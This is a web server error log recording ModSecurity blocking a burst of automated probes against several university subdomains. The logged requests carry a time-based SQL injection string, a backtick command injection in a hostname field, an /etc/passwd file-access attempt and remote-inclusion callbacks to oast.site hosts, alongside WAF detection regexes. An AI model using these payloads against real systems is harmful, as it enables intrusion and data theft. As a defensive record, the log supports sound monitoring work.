[Tue Aug 29 11:33:11.337138 2023] [:error] [pid 1088] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:type: |cat/etc/passwd||"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.unla.ac.id"] [uri "/webadm/"] [unique_id "ZO11B8Co-f0AAARA7d4AAAAA"]
[Tue Aug 29 11:33:12.509713 2023] [:error] [pid 1104] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:docid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:docid: 1 AND (SELECT 6288 FROM (SELECT(SLEEP(6)))HRaz)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11CMCo-f0AAARQ36UAAAAB"]
[Tue Aug 29 11:33:12.515694 2023] [:error] [pid 1091] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:docid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:docid: 1 AND (SELECT 6288 FROM (SELECT(SLEEP(6)))HRaz)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11CMCo-f0AAARD1SwAAAAH"]
[Tue Aug 29 11:33:12.530861 2023] [:error] [pid 1104] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:docid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:docid: 1 AND (SELECT 6288 FROM (SELECT(SLEEP(6)))HRaz)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11CMCo-f0AAARQ36YAAAAB"]
[Tue Aug 29 11:33:12.536829 2023] [:error] [pid 1112] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:docid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:docid: 1 AND (SELECT 6288 FROM (SELECT(SLEEP(6)))HRaz)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11CMCo-f0AAARYxDAAAAAJ"]
[Tue Aug 29 11:33:12.541290 2023] [:error] [pid 1088] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:docid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:docid: 1 AND (SELECT 6288 FROM (SELECT(SLEEP(6)))HRaz)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11CMCo-f0AAARA7eMAAAAA"]
[Tue Aug 29 11:33:12.583926 2023] [:error] [pid 876] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmn8l5jmimk2adbbnlgf9smsose1zezy.oast.site found within TX:1: cjmn8l5jmimk2adbbnlgf9smsose1zezy.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "unla.ac.id"] [uri "/"] [unique_id "ZO11CMCo-f0AAANsAcgAAAAD"]
[Tue Aug 29 11:33:12.603668 2023] [:error] [pid 1104] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmn8l5jmimk2adbbnlgubfyo1itik1cp.oast.site found within TX:1: cjmn8l5jmimk2adbbnlgubfyo1itik1cp.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "ft.unla.ac.id"] [uri "/"] [unique_id "ZO11CMCo-f0AAARQ36kAAAAB"]
[Tue Aug 29 11:33:12.628769 2023] [:error] [pid 1104] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmn8l5jmimk2adbbnlgaqgysbgk5wys1.oast.site found within TX:1: cjmn8l5jmimk2adbbnlgaqgysbgk5wys1.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "journal.unla.ac.id"] [uri "/"] [unique_id "ZO11CMCo-f0AAARQ36oAAAAB"]
[Tue Aug 29 11:33:12.682630 2023] [:error] [pid 1107] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmn8l5jmimk2adbbnlga76b5oite8pxm.oast.site found within TX:1: cjmn8l5jmimk2adbbnlga76b5oite8pxm.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "pusatbahasa.unla.ac.id"] [uri "/"] [unique_id "ZO11CMCo-f0AAARTEL0AAAAG"]
[Tue Aug 29 11:33:12.685200 2023] [:error] [pid 1091] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmn8l5jmimk2adbbnlgx7txbzrmk5pzf.oast.site found within TX:1: cjmn8l5jmimk2adbbnlgx7txbzrmk5pzf.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "informatika.unla.ac.id"] [uri "/"] [unique_id "ZO11CMCo-f0AAARD1TIAAAAH"]
[Tue Aug 29 11:33:12.746618 2023] [:error] [pid 1091] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:docid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:docid: 1 AND (SELECT 6288 FROM (SELECT(SLEEP(6)))HRaz)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11CMCo-f0AAARD1TMAAAAH"]
[Tue Aug 29 11:33:12.764043 2023] [:error] [pid 1101] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:(?:n(?:et(?:\\\\b\\\\W+?\\\\blocalgroup|\\\\.exe)|(?:map|c)\\\\.exe)|t(?:racer(?:oute|t)|elnet\\\\.exe|clsh8?|ftp)|(?:w(?:guest|sh)|rcmd|ftp)\\\\.exe|echo\\\\b\\\\W*?\\\\by+)\\\\b|c(?:md(?:(?:\\\\.exe|32)\\\\b|\\\\b\\\\W*?\\\\/c)|d(?:\\\\b\\\\W*?[\\\\/]|\\\\W*?\\\\.\\\\.)|hmod.{0,40}?\\\\ ..." at ARGS:hostname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "221"] [id "950006"] [rev "3"] [msg "System Command Injection"] [data "Matched Data: `id found within ARGS:hostname: `id`"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/controller/ping.php"] [unique_id "ZO11CMCo-f0AAARNk9AAAAAS"]
[Tue Aug 29 11:33:12.764066 2023] [:error] [pid 1107] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:(?:n(?:et(?:\\\\b\\\\W+?\\\\blocalgroup|\\\\.exe)|(?:map|c)\\\\.exe)|t(?:racer(?:oute|t)|elnet\\\\.exe|clsh8?|ftp)|(?:w(?:guest|sh)|rcmd|ftp)\\\\.exe|echo\\\\b\\\\W*?\\\\by+)\\\\b|c(?:md(?:(?:\\\\.exe|32)\\\\b|\\\\b\\\\W*?\\\\/c)|d(?:\\\\b\\\\W*?[\\\\/]|\\\\W*?\\\\.\\\\.)|hmod.{0,40}?\\\\ ..." at ARGS:hostname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "221"] [id "950006"] [rev "3"] [msg "System Command Injection"] [data "Matched Data: `id found within ARGS:hostname: `id`"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/controller/ping.php"] [unique_id "ZO11CMCo-f0AAARTEL4AAAAG"]
[Tue Aug 29 11:33:12.765732 2023] [:error] [pid 1095] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmn8l5jmimk2adbbnlg8a55ygtn44t7c.oast.site found within TX:1: cjmn8l5jmimk2adbbnlg8a55ygtn44t7c.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "informatika.unla.ac.id"] [uri "/"] [unique_id "ZO11CMCo-f0AAARH7NsAAAAM"]
[Tue Aug 29 11:33:12.766867 2023] [:error] [pid 1091] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmn8l5jmimk2adbbnlg55tz4sn9w86ej.oast.site found within TX:1: cjmn8l5jmimk2adbbnlg55tz4sn9w86ej.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "journal.unla.ac.id"] [uri "/"] [unique_id "ZO11CMCo-f0AAARD1TQAAAAH"]
[Tue Aug 29 11:33:12.782535 2023] [:error] [pid 876] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:(?:n(?:et(?:\\\\b\\\\W+?\\\\blocalgroup|\\\\.exe)|(?:map|c)\\\\.exe)|t(?:racer(?:oute|t)|elnet\\\\.exe|clsh8?|ftp)|(?:w(?:guest|sh)|rcmd|ftp)\\\\.exe|echo\\\\b\\\\W*?\\\\by+)\\\\b|c(?:md(?:(?:\\\\.exe|32)\\\\b|\\\\b\\\\W*?\\\\/c)|d(?:\\\\b\\\\W*?[\\\\/]|\\\\W*?\\\\.\\\\.)|hmod.{0,40}?\\\\ ..." at ARGS:hostname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "221"] [id "950006"] [rev "3"] [msg "System Command Injection"] [data "Matched Data: `id found within ARGS:hostname: `id`"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/controller/ping.php"] [unique_id "ZO11CMCo-f0AAANsAcsAAAAD"]
[Tue Aug 29 11:33:12.783981 2023] [:error] [pid 1107] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:(?:n(?:et(?:\\\\b\\\\W+?\\\\blocalgroup|\\\\.exe)|(?:map|c)\\\\.exe)|t(?:racer(?:oute|t)|elnet\\\\.exe|clsh8?|ftp)|(?:w(?:guest|sh)|rcmd|ftp)\\\\.exe|echo\\\\b\\\\W*?\\\\by+)\\\\b|c(?:md(?:(?:\\\\.exe|32)\\\\b|\\\\b\\\\W*?\\\\/c)|d(?:\\\\b\\\\W*?[\\\\/]|\\\\W*?\\\\.\\\\.)|hmod.{0,40}?\\\\ ..." at ARGS:hostname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "221"] [id "950006"] [rev "3"] [msg "System Command Injection"] [data "Matched Data: `id found within ARGS:hostname: `id`"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/controller/ping.php"] [unique_id "ZO11CMCo-f0AAARTEL8AAAAG"]
[Tue Aug 29 11:33:12.785430 2023] [:error] [pid 1095] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmn8l5jmimk2adbbnlgy6hguume8gdd4.oast.site found within TX:1: cjmn8l5jmimk2adbbnlgy6hguume8gdd4.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "pusatbahasa.unla.ac.id"] [uri "/"] [unique_id "ZO11CMCo-f0AAARH7NwAAAAM"]
[Tue Aug 29 11:33:12.804664 2023] [:error] [pid 1101] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmn8l5jmimk2adbbnlgjurfgza63qngx.oast.site found within TX:1: cjmn8l5jmimk2adbbnlgjurfgza63qngx.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "ft.unla.ac.id"] [uri "/"] [unique_id "ZO11CMCo-f0AAARNk9IAAAAS"]
[Tue Aug 29 11:33:12.808535 2023] [:error] [pid 1091] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmn8l5jmimk2adbbnlguawxk4sb3uter.oast.site found within TX:1: cjmn8l5jmimk2adbbnlguawxk4sb3uter.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "unla.ac.id"] [uri "/"] [unique_id "ZO11CMCo-f0AAARD1TYAAAAH"]
[Tue Aug 29 11:33:12.824508 2023] [:error] [pid 1107] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:(?:n(?:et(?:\\\\b\\\\W+?\\\\blocalgroup|\\\\.exe)|(?:map|c)\\\\.exe)|t(?:racer(?:oute|t)|elnet\\\\.exe|clsh8?|ftp)|(?:w(?:guest|sh)|rcmd|ftp)\\\\.exe|echo\\\\b\\\\W*?\\\\by+)\\\\b|c(?:md(?:(?:\\\\.exe|32)\\\\b|\\\\b\\\\W*?\\\\/c)|d(?:\\\\b\\\\W*?[\\\\/]|\\\\W*?\\\\.\\\\.)|hmod.{0,40}?\\\\ ..." at ARGS:hostname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "221"] [id "950006"] [rev "3"] [msg "System Command Injection"] [data "Matched Data: `id found within ARGS:hostname: `id`"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/controller/ping.php"] [unique_id "ZO11CMCo-f0AAARTEMEAAAAG"]
[Tue Aug 29 11:33:13.305303 2023] [:error] [pid 1091] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://cjmn8l5jmimk2adbbnlgwj4gazay9wdhz.oast.site found within TX:1: cjmn8l5jmimk2adbbnlgwj4gazay9wdhz.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "ft.unla.ac.id"] [uri "/"] [unique_id "ZO11CcCo-f0AAARD1TgAAAAH"]
[Tue Aug 29 11:33:13.305547 2023] [:error] [pid 1104] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:(?:n(?:et(?:\\\\b\\\\W+?\\\\blocalgroup|\\\\.exe)|(?:map|c)\\\\.exe)|t(?:racer(?:oute|t)|elnet\\\\.exe|clsh8?|ftp)|(?:w(?:guest|sh)|rcmd|ftp)\\\\.exe|echo\\\\b\\\\W*?\\\\by+)\\\\b|c(?:md(?:(?:\\\\.exe|32)\\\\b|\\\\b\\\\W*?\\\\/c)|d(?:\\\\b\\\\W*?[\\\\/]|\\\\W*?\\\\.\\\\.)|hmod.{0,40}?\\\\ ..." at ARGS:hostname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "221"] [id "950006"] [rev "3"] [msg "System Command Injection"] [data "Matched Data: `id found within ARGS:hostname: `id`"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/controller/ping.php"] [unique_id "ZO11CcCo-f0AAARQ37AAAAAB"]
[Tue Aug 29 11:33:13.316360 2023] [:error] [pid 1107] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://cjmn8l5jmimk2adbbnlg6gw47hjjomnin.oast.site found within TX:1: cjmn8l5jmimk2adbbnlg6gw47hjjomnin.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "pusatbahasa.unla.ac.id"] [uri "/"] [unique_id "ZO11CcCo-f0AAARTEMMAAAAG"]
[Tue Aug 29 11:33:13.319350 2023] [:error] [pid 1095] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://cjmn8l5jmimk2adbbnlg9o1uykpntdjx1.oast.site found within TX:1: cjmn8l5jmimk2adbbnlg9o1uykpntdjx1.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "journal.unla.ac.id"] [uri "/"] [unique_id "ZO11CcCo-f0AAARH7OAAAAAM"]
[Tue Aug 29 11:33:13.324425 2023] [:error] [pid 1112] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://cjmn8l5jmimk2adbbnlgjs3bif36azfxo.oast.site found within TX:1: cjmn8l5jmimk2adbbnlgjs3bif36azfxo.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "informatika.unla.ac.id"] [uri "/"] [unique_id "ZO11CcCo-f0AAARYxDMAAAAJ"]
[Tue Aug 29 11:33:13.325503 2023] [:error] [pid 1117] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://cjmn8l5jmimk2adbbnlgo9sjc56auongr.oast.site found within TX:1: cjmn8l5jmimk2adbbnlgo9sjc56auongr.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "unla.ac.id"] [uri "/"] [unique_id "ZO11CcCo-f0AAARdiHEAAAAK"]
